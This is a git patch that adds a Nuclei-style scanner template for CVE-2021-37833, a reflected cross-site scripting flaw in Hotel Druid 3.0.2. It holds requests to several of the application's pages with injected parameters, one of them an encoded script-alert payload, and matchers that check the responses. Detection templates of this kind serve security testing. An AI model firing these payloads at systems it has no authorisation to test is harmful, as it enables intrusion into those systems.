From 796093ae5df86d2d5c19e44674cb0be5efd6338b Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 15 Sep 2021 11:26:23 +0700 Subject: [PATCH] Create CVE-2021-37833.yaml --- cves/2021/CVE-2021-37833.yaml | 36 +++++++++++++++++++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 cves/2021/CVE-2021-37833.yaml diff --git a/cves/2021/CVE-2021-37833.yaml b/cves/2021/CVE-2021-37833.yaml new file mode 100644 index 0000000000..e720ad1081 --- /dev/null +++ b/cves/2021/CVE-2021-37833.yaml @@ -0,0 +1,36 @@ +id: CVE-2021-37833 + +info: + name: Hotel Druid 3.0.2 XSS + author: pikpikcu + severity: medium + descreption: reflected cross-site scripting (XSS) vulnerability exists in multiple pages in version 3.0.2 of the Hotel Druid application that allows for arbitrary execution of JavaScript commands. + reference: + - https://github.com/dievus/CVE-2021-37833 + - https://nvd.nist.gov/vuln/detail/CVE-2021-37833 + tags: cves,cve2021,hotel-druid,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/visualizza_tabelle.php?anno=2021&tipo_tabella=prenotazioni&sel_tab_prenota=tutte&wo03b">w5px3=1' + - '{{BaseURL}}/storia_soldi.php?piu17">e3esq=1' + - '{{BaseURL}}/tabella.php?jkuh3">yql8b=1' + - '{{BaseURL}}/crea_modelli.php?anno=2021&id_sessione=&fonte_dati_conn=attuali&T_PHPR_DB_TYPE=postgresql&T_PHPR_DB_NAME=%C2%9E%C3%A9e&T_PHPR_DB_HOST=localhost&T_PHPR_DB_PORT=5432&T_PHPR_DB_USER=%C2%9E%C3%A9e&T_PHPR_DB_PASS=%C2%9E%C3%A9e&T_PHPR_LOAD_EXT=NO&T_PHPR_TAB_PRE=%C2%9E%C3%A9e&anno_modello=2021&lingua_modello=en&cambia_frasi=SIipq85%22%3E%3Cscript%3Ealert(document.domain)%3C%2fscript%3Ef9xkbujgt24&form_availability_calendar_template=1' + + matchers-condition: and + matchers: + + - type: word + words: + - '' + part: body + + - type: word + words: + - 'Content-Type: text/html' + part: header + + - type: status + status: + - 200